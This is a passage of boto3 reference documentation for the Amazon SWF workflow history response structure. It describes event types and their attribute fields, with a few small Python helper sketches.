                        'externalWorkflowExecutionCancelRequestedEventAttributes': {
                            'workflowExecution': {
                                'workflowId': 'string',
                                'runId': 'string'
                            },
                            'initiatedEventId': 123
                        },
                        'requestCancelExternalWorkflowExecutionInitiatedEventAttributes': {
                            'workflowId': 'string',
                            'runId': 'string',
                            'decisionTaskCompletedEventId': 123,
                            'control': 'string'
                        },
                        'requestCancelExternalWorkflowExecutionFailedEventAttributes': {
                            'workflowId': 'string',
                            'runId': 'string',
                            'cause': 'UNKNOWN_EXTERNAL_WORKFLOW_EXECUTION'|'REQUEST_CANCEL_EXTERNAL_WORKFLOW_EXECUTION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
                            'initiatedEventId': 123,
                            'decisionTaskCompletedEventId': 123,
                            'control': 'string'
                        },
                        'scheduleActivityTaskFailedEventAttributes': {
                            'activityType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'activityId': 'string',
                            'cause': 'ACTIVITY_TYPE_DEPRECATED'|'ACTIVITY_TYPE_DOES_NOT_EXIST'|'ACTIVITY_ID_ALREADY_IN_USE'|'OPEN_ACTIVITIES_LIMIT_EXCEEDED'|'ACTIVITY_CREATION_RATE_EXCEEDED'|'DEFAULT_SCHEDULE_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_SCHEDULE_TO_START_TIMEOUT_UNDEFINED'|'DEFAULT_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_HEARTBEAT_TIMEOUT_UNDEFINED'|'OPERATION_NOT_PERMITTED',
                            'decisionTaskCompletedEventId': 123
                        },
                        'requestCancelActivityTaskFailedEventAttributes': {
                            'activityId': 'string',
                            'cause': 'ACTIVITY_ID_UNKNOWN'|'OPERATION_NOT_PERMITTED',
                            'decisionTaskCompletedEventId': 123
                        },
                        'startTimerFailedEventAttributes': {
                            'timerId': 'string',
                            'cause': 'TIMER_ID_ALREADY_IN_USE'|'OPEN_TIMERS_LIMIT_EXCEEDED'|'TIMER_CREATION_RATE_EXCEEDED'|'OPERATION_NOT_PERMITTED',
                            'decisionTaskCompletedEventId': 123
                        },
                        'cancelTimerFailedEventAttributes': {
                            'timerId': 'string',
                            'cause': 'TIMER_ID_UNKNOWN'|'OPERATION_NOT_PERMITTED',
                            'decisionTaskCompletedEventId': 123
                        },
                        'startChildWorkflowExecutionFailedEventAttributes': {
                            'workflowType': {
                                'name': 'string',
                                'version': 'string'
                            },
                            'cause': 'WORKFLOW_TYPE_DOES_NOT_EXIST'|'WORKFLOW_TYPE_DEPRECATED'|'OPEN_CHILDREN_LIMIT_EXCEEDED'|'OPEN_WORKFLOWS_LIMIT_EXCEEDED'|'CHILD_CREATION_RATE_EXCEEDED'|'WORKFLOW_ALREADY_RUNNING'|'DEFAULT_EXECUTION_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_TASK_LIST_UNDEFINED'|'DEFAULT_TASK_START_TO_CLOSE_TIMEOUT_UNDEFINED'|'DEFAULT_CHILD_POLICY_UNDEFINED'|'OPERATION_NOT_PERMITTED',
                            'workflowId': 'string',
                            'initiatedEventId': 123,
                            'decisionTaskCompletedEventId': 123,
                            'control': 'string'
                        },
                        'lambdaFunctionScheduledEventAttributes': {
                            'id': 'string',
                            'name': 'string',
                            'control': 'string',
                            'input': 'string',
                            'startToCloseTimeout': 'string',
                            'decisionTaskCompletedEventId': 123
                        },
                        'lambdaFunctionStartedEventAttributes': {
                            'scheduledEventId': 123
                        },
                        'lambdaFunctionCompletedEventAttributes': {
                            'scheduledEventId': 123,
                            'startedEventId': 123,
                            'result': 'string'
                        },
                        'lambdaFunctionFailedEventAttributes': {
                            'scheduledEventId': 123,
                            'startedEventId': 123,
                            'reason': 'string',
                            'details': 'string'
                        },
                        'lambdaFunctionTimedOutEventAttributes': {
                            'scheduledEventId': 123,
                            'startedEventId': 123,
                            'timeoutType': 'START_TO_CLOSE'
                        },
                        'scheduleLambdaFunctionFailedEventAttributes': {
                            'id': 'string',
                            'name': 'string',
                            'cause': 'ID_ALREADY_IN_USE'|'OPEN_LAMBDA_FUNCTIONS_LIMIT_EXCEEDED'|'LAMBDA_FUNCTION_CREATION_RATE_EXCEEDED'|'LAMBDA_SERVICE_NOT_AVAILABLE_IN_REGION',
                            'decisionTaskCompletedEventId': 123
                        },
                        'startLambdaFunctionFailedEventAttributes': {
                            'scheduledEventId': 123,
                            'cause': 'ASSUME_ROLE_FAILED',
                            'message': 'string'
                        }
                    },
                ],
                'NextToken': 'string'
            }
**Response Structure**
- *(dict) --*
Paginated representation of a workflow history for a workflow execution. This is the up to date, complete and authoritative record of the events related to all tasks and events in the life of the workflow execution.
- **events** *(list) --*
The list of history events.
- *(dict) --*
Event within a workflow execution. A history event can be one of these types:
* ``ActivityTaskCancelRequested`` – A ``RequestCancelActivityTask`` decision was received by the system.
* ``ActivityTaskCanceled`` – The activity task was successfully canceled.
* ``ActivityTaskCompleted`` – An activity worker successfully completed an activity task by calling RespondActivityTaskCompleted .
* ``ActivityTaskFailed`` – An activity worker failed an activity task by calling RespondActivityTaskFailed .
* ``ActivityTaskScheduled`` – An activity task was scheduled for execution.
* ``ActivityTaskStarted`` – The scheduled activity task was dispatched to a worker.
* ``ActivityTaskTimedOut`` – The activity task timed out.
* ``CancelTimerFailed`` – Failed to process CancelTimer decision. This happens when the decision isn't configured properly, for example no timer exists with the specified timer Id.
* ``CancelWorkflowExecutionFailed`` – A request to cancel a workflow execution failed.
* ``ChildWorkflowExecutionCanceled`` – A child workflow execution, started by this workflow execution, was canceled and closed.
* ``ChildWorkflowExecutionCompleted`` – A child workflow execution, started by this workflow execution, completed successfully and was closed.
* ``ChildWorkflowExecutionFailed`` – A child workflow execution, started by this workflow execution, failed to complete successfully and was closed.
* ``ChildWorkflowExecutionStarted`` – A child workflow execution was successfully started.
* ``ChildWorkflowExecutionTerminated`` – A child workflow execution, started by this workflow execution, was terminated.
* ``ChildWorkflowExecutionTimedOut`` – A child workflow execution, started by this workflow execution, timed out and was closed.
* ``CompleteWorkflowExecutionFailed`` – The workflow execution failed to complete.
* ``ContinueAsNewWorkflowExecutionFailed`` – The workflow execution failed to complete after being continued as a new workflow execution.
* ``DecisionTaskCompleted`` – The decider successfully completed a decision task by calling RespondDecisionTaskCompleted .
* ``DecisionTaskScheduled`` – A decision task was scheduled for the workflow execution.
* ``DecisionTaskStarted`` – The decision task was dispatched to a decider.
* ``DecisionTaskTimedOut`` – The decision task timed out.
* ``ExternalWorkflowExecutionCancelRequested`` – Request to cancel an external workflow execution was successfully delivered to the target execution.
* ``ExternalWorkflowExecutionSignaled`` – A signal, requested by this workflow execution, was successfully delivered to the target external workflow execution.
* ``FailWorkflowExecutionFailed`` – A request to mark a workflow execution as failed, itself failed.
* ``MarkerRecorded`` – A marker was recorded in the workflow history as the result of a ``RecordMarker`` decision.
* ``RecordMarkerFailed`` – A ``RecordMarker`` decision was returned as failed.
* ``RequestCancelActivityTaskFailed`` – Failed to process RequestCancelActivityTask decision. This happens when the decision isn't configured properly.
* ``RequestCancelExternalWorkflowExecutionFailed`` – Request to cancel an external workflow execution failed.
* ``RequestCancelExternalWorkflowExecutionInitiated`` – A request was made to request the cancellation of an external workflow execution.
* ``ScheduleActivityTaskFailed`` – Failed to process ScheduleActivityTask decision. This happens when the decision isn't configured properly, for example the activity type specified isn't registered.
* ``SignalExternalWorkflowExecutionFailed`` – The request to signal an external workflow execution failed.
* ``SignalExternalWorkflowExecutionInitiated`` – A request to signal an external workflow was made.
* ``StartActivityTaskFailed`` – A scheduled activity task failed to start.
* ``StartChildWorkflowExecutionFailed`` – Failed to process a ``StartChildWorkflowExecution`` decision. This happens when the decision isn't configured properly, for example when the specified workflow type isn't registered.
* ``StartChildWorkflowExecutionInitiated`` – A request was made to start a child workflow execution.
* ``StartTimerFailed`` – Failed to process a ``StartTimer`` decision. This happens when the decision isn't configured properly, for example when a timer with the specified timer ID already exists.
* ``TimerCanceled`` – A timer, previously started for this workflow execution, was successfully canceled.
* ``TimerFired`` – A timer, previously started for this workflow execution, fired.
* ``TimerStarted`` – A timer was started for the workflow execution due to a ``StartTimer`` decision.
* ``WorkflowExecutionCancelRequested`` – A request to cancel this workflow execution was made.
* ``WorkflowExecutionCanceled`` – The workflow execution was successfully canceled and closed.
* ``WorkflowExecutionCompleted`` – The workflow execution was closed due to successful completion.
* ``WorkflowExecutionContinuedAsNew`` – The workflow execution was closed and a new execution of the same type was created with the same workflowId.
* ``WorkflowExecutionFailed`` – The workflow execution closed due to a failure.
* ``WorkflowExecutionSignaled`` – An external signal was received for the workflow execution.
* ``WorkflowExecutionStarted`` – The workflow execution was started.
* ``WorkflowExecutionTerminated`` – The workflow execution was terminated.
* ``WorkflowExecutionTimedOut`` – The workflow execution was closed because a time out was exceeded.
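Each event type above pairs with a correspondingly named ``…EventAttributes`` member in the same event structure (for example, ``WorkflowExecutionStarted`` pairs with ``workflowExecutionStartedEventAttributes``, described below). A minimal sketch of dispatching on that naming convention; the helper name and sample event are illustrative, not part of the boto3 API:

```python
def event_attributes(event):
    """Return the attributes dict for a history event, or None.

    Relies on the naming convention visible in this structure:
    eventType "WorkflowExecutionStarted" maps to the member
    "workflowExecutionStartedEventAttributes".
    """
    event_type = event["eventType"]
    key = event_type[0].lower() + event_type[1:] + "EventAttributes"
    return event.get(key)


# Illustrative event shaped like the structure documented here.
sample = {
    "eventId": 1,
    "eventType": "WorkflowExecutionStarted",
    "workflowExecutionStartedEventAttributes": {"input": "hello"},
}
```

This avoids a long ``if``/``elif`` chain over thirty-odd event types when all the decider needs is the attributes payload.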
- **eventTimestamp** *(datetime) --*
The date and time when the event occurred.
- **eventType** *(string) --*
The type of the history event.
- **eventId** *(integer) --*
The system-generated ID of the event. This ID uniquely identifies the event within the workflow execution history.
- **workflowExecutionStartedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **input** *(string) --*
The input provided to the workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The maximum duration for this workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration of decision tasks for this workflow type.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions if this workflow execution is terminated, by calling the ``TerminateWorkflowExecution`` action explicitly or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **taskList** *(dict) --*
The name of the task list for scheduling the decision tasks for this workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority of the decision tasks in the workflow execution.
- **workflowType** *(dict) --*
The workflow type of this execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **tagList** *(list) --*
The list of tags associated with this workflow execution. An execution can have up to 5 tags.
- *(string) --*
- **continuedExecutionRunId** *(string) --*
If this workflow execution was started due to a ``ContinueAsNewWorkflowExecution`` decision, then it contains the ``runId`` of the previous workflow execution that was closed and continued as this execution.
- **parentWorkflowExecution** *(dict) --*
The source workflow execution that started this workflow execution. The member isn't set if the workflow execution was not started by a workflow.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **parentInitiatedEventId** *(integer) --*
The ID of the ``StartChildWorkflowExecutionInitiated`` event corresponding to the ``StartChildWorkflowExecution`` decision to start this workflow execution. The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **lambdaRole** *(string) --*
The IAM role attached to the workflow execution.
- **workflowExecutionCompletedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **result** *(string) --*
The result produced by the workflow execution upon successful completion.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CompleteWorkflowExecution`` decision to complete this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **completeWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``CompleteWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CompleteWorkflowExecution`` decision to complete this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The descriptive reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``FailWorkflowExecution`` decision to fail this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **failWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``FailWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``FailWorkflowExecution`` decision to fail this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionTimedOutEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of timeout that caused this event.
- **childPolicy** *(string) --*
The policy used for the child workflow executions of this workflow execution.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **workflowExecutionCanceledEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **details** *(string) --*
The details of the cancellation.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cancelWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``CancelWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``CancelWorkflowExecution`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionContinuedAsNewEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionContinuedAsNew`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **input** *(string) --*
The input provided to the new workflow execution.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``ContinueAsNewWorkflowExecution`` decision that started this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **newExecutionRunId** *(string) --*
The ``runId`` of the new workflow execution.
- **executionStartToCloseTimeout** *(string) --*
The total duration allowed for the new workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **taskList** *(dict) --*
The task list to use for the decisions of the new (continued) workflow execution.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority of the task to use for the decisions of the new (continued) workflow execution.
- **taskStartToCloseTimeout** *(string) --*
The maximum duration of decision tasks for the new workflow execution.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
- **childPolicy** *(string) --*
The policy to use for the child workflow executions of the new execution if it is terminated by calling the ``TerminateWorkflowExecution`` action explicitly or due to an expired timeout.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **tagList** *(list) --*
The list of tags associated with the new workflow execution.
- *(string) --*
- **workflowType** *(dict) --*
The workflow type of this execution.
- **name** *(string) --*
The name of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **version** *(string) --*
The version of the workflow type.
.. note::
The combination of workflow type name and version must be unique within a domain.
- **lambdaRole** *(string) --*
The IAM role to attach to the new (continued) workflow execution.
- **continueAsNewWorkflowExecutionFailedEventAttributes** *(dict) --*
If the event is of type ``ContinueAsNewWorkflowExecutionFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **cause** *(string) --*
The cause of the failure. This information is generated by the system and can be useful for diagnostic purposes.
.. note::
If ``cause`` is set to ``OPERATION_NOT_PERMITTED`` , the decision failed because it lacked sufficient permissions. For details and example IAM policies, see `Using IAM to Manage Access to Amazon SWF Workflows <http://docs.aws.amazon.com/amazonswf/latest/developerguide/swf-dev-iam.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``ContinueAsNewWorkflowExecution`` decision that started this execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **workflowExecutionTerminatedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionTerminated`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The reason provided for the termination.
- **details** *(string) --*
The details provided for the termination.
- **childPolicy** *(string) --*
The policy used for the child workflow executions of this workflow execution.
The supported child policies are:
* ``TERMINATE`` – The child executions are terminated.
* ``REQUEST_CANCEL`` – A request to cancel is attempted for each child execution by recording a ``WorkflowExecutionCancelRequested`` event in its history. It is up to the decider to take appropriate actions when it receives an execution history with this event.
* ``ABANDON`` – No action is taken. The child executions continue to run.
- **cause** *(string) --*
If set, indicates that the workflow execution was automatically terminated, and specifies the cause. This happens if the parent workflow execution times out or is terminated and the child policy is set to terminate child executions.
- **workflowExecutionCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``WorkflowExecutionCancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **externalWorkflowExecution** *(dict) --*
The external workflow execution for which the cancellation was requested.
- **workflowId** *(string) --*
The user defined identifier associated with the workflow execution.
- **runId** *(string) --*
A system-generated unique identifier for the workflow execution.
- **externalInitiatedEventId** *(integer) --*
The ID of the ``RequestCancelExternalWorkflowExecutionInitiated`` event corresponding to the ``RequestCancelExternalWorkflowExecution`` decision to cancel this workflow execution. The source event with this ID can be found in the history of the source workflow execution. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **cause** *(string) --*
If set, indicates that the request to cancel the workflow execution was automatically generated, and specifies the cause. This happens if the parent workflow execution times out or is terminated, and the child policy is set to cancel child executions.
- **decisionTaskScheduledEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskScheduled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **taskList** *(dict) --*
The name of the task list in which the decision task was scheduled.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
A task priority that, if set, specifies the priority for this decision task. Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **startToCloseTimeout** *(string) --*
The maximum duration for this decision task. The task is considered timed out if it doesn't complete within this duration.
The duration is specified in seconds, an integer greater than or equal to ``0`` . You can use ``NONE`` to specify unlimited duration.
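The duration fields throughout this structure share one encoding: a string holding a non-negative integer number of seconds, or the literal ``NONE`` for an unlimited duration. A small hedged parser for that convention (the helper name is ours, not boto3's):

```python
def parse_swf_duration(value):
    """Decode an SWF duration string.

    Returns None for "NONE" (unlimited); otherwise returns the
    duration as an int number of seconds. Raises ValueError for
    negative or non-integer input.
    """
    if value == "NONE":
        return None
    seconds = int(value)
    if seconds < 0:
        raise ValueError("SWF durations must be >= 0 seconds")
    return seconds
```

Mapping ``NONE`` to ``None`` keeps "unlimited" distinct from ``0`` seconds in downstream timeout arithmetic.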
- **decisionTaskStartedEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **identity** *(string) --*
Identity of the decider making the request. This enables diagnostic tracing when problems arise. The form of this identity is user defined.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskCompletedEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **executionContext** *(string) --*
User defined context for the workflow execution.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``DecisionTaskStarted`` event recorded when this decision task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **decisionTaskTimedOutEventAttributes** *(dict) --*
If the event is of type ``DecisionTaskTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of timeout that expired before the decision task could be completed.
- **scheduledEventId** *(integer) --*
The ID of the ``DecisionTaskScheduled`` event that was recorded when this decision task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``DecisionTaskStarted`` event recorded when this decision task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskScheduledEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskScheduled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **activityType** *(dict) --*
The type of the activity task.
- **name** *(string) --*
The name of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **version** *(string) --*
The version of this activity.
.. note::
The combination of activity type name and version must be unique within a domain.
- **activityId** *(string) --*
The unique ID of the activity task.
- **input** *(string) --*
The input provided to the activity task.
- **control** *(string) --*
Data attached to the event that can be used by the decider in subsequent workflow tasks. This data isn't sent to the activity.
- **scheduleToStartTimeout** *(string) --*
The maximum amount of time the activity task can wait to be assigned to a worker.
- **scheduleToCloseTimeout** *(string) --*
The maximum amount of time for this activity task.
- **startToCloseTimeout** *(string) --*
The maximum amount of time a worker may take to process the activity task.
- **taskList** *(dict) --*
The task list in which the activity task has been scheduled.
- **name** *(string) --*
The name of the task list.
- **taskPriority** *(string) --*
The priority to assign to the scheduled activity task. If set, this overrides any default priority value that was assigned when the activity type was registered.
Valid values are integers that range from Java's ``Integer.MIN_VALUE`` (-2147483648) to ``Integer.MAX_VALUE`` (2147483647). Higher numbers indicate higher priority.
For more information about setting task priority, see `Setting Task Priority <http://docs.aws.amazon.com/amazonswf/latest/developerguide/programming-priority.html>`__ in the *Amazon SWF Developer Guide* .
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision that resulted in the scheduling of this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **heartbeatTimeout** *(string) --*
The maximum time before which the worker processing this task must report progress by calling ``RecordActivityTaskHeartbeat``. If the timeout is exceeded, the activity task is automatically timed out. If the worker subsequently attempts to record a heartbeat or return a result, it is ignored.
- **activityTaskStartedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskStarted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **identity** *(string) --*
Identity of the worker that was assigned this task. This aids diagnostics when problems arise. The form of this identity is user defined.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskCompletedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskCompleted`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **result** *(string) --*
The results of the activity task.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
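The ``scheduledEventId`` and ``startedEventId`` back-references above make it possible to reconstruct one activity task's full lifecycle from a flat history list, as the repeated "tracing back the chain of events" notes suggest. A sketch under the assumption that the history has already been fetched (for example with boto3's ``get_workflow_execution_history``); the function name and sample events are illustrative:

```python
def trace_activity_task(history, completed_event):
    """Given an ActivityTaskCompleted event, follow its scheduledEventId
    and startedEventId back through the history and return the
    (scheduled, started, completed) event triple."""
    by_id = {event["eventId"]: event for event in history}
    attrs = completed_event["activityTaskCompletedEventAttributes"]
    return (
        by_id[attrs["scheduledEventId"]],
        by_id[attrs["startedEventId"]],
        completed_event,
    )


# Illustrative three-event history for a single activity task.
history = [
    {"eventId": 5, "eventType": "ActivityTaskScheduled"},
    {"eventId": 6, "eventType": "ActivityTaskStarted"},
    {"eventId": 7, "eventType": "ActivityTaskCompleted",
     "activityTaskCompletedEventAttributes": {
         "result": "42", "scheduledEventId": 5, "startedEventId": 6}},
]
```

The same ID-following pattern applies to the failed, timed-out, and canceled variants, which carry the same two back-references.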
- **activityTaskFailedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskFailed`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **reason** *(string) --*
The reason provided for the failure.
- **details** *(string) --*
The details of the failure.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskTimedOutEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskTimedOut`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **timeoutType** *(string) --*
The type of the timeout that caused this event.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **details** *(string) --*
Contains the content of the ``details`` parameter for the last call made by the activity to ``RecordActivityTaskHeartbeat`` .
- **activityTaskCanceledEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskCanceled`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **details** *(string) --*
Details of the cancellation.
- **scheduledEventId** *(integer) --*
The ID of the ``ActivityTaskScheduled`` event that was recorded when this activity task was scheduled. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **startedEventId** *(integer) --*
The ID of the ``ActivityTaskStarted`` event recorded when this activity task was started. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **latestCancelRequestedEventId** *(integer) --*
If set, contains the ID of the last ``ActivityTaskCancelRequested`` event recorded for this activity task. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityTaskCancelRequestedEventAttributes** *(dict) --*
If the event is of type ``ActivityTaskCancelRequested`` then this member is set and provides detailed information about the event. It isn't set for other event types.
- **decisionTaskCompletedEventId** *(integer) --*
The ID of the ``DecisionTaskCompleted`` event corresponding to the decision task that resulted in the ``RequestCancelActivityTask`` decision for this cancellation request. This information can be useful for diagnosing problems by tracing back the chain of events leading up to this event.
- **activityId** *(string) --*
The unique ID of the task.
- **workflowExecutionSignaledEventAttributes** *(dict) --*
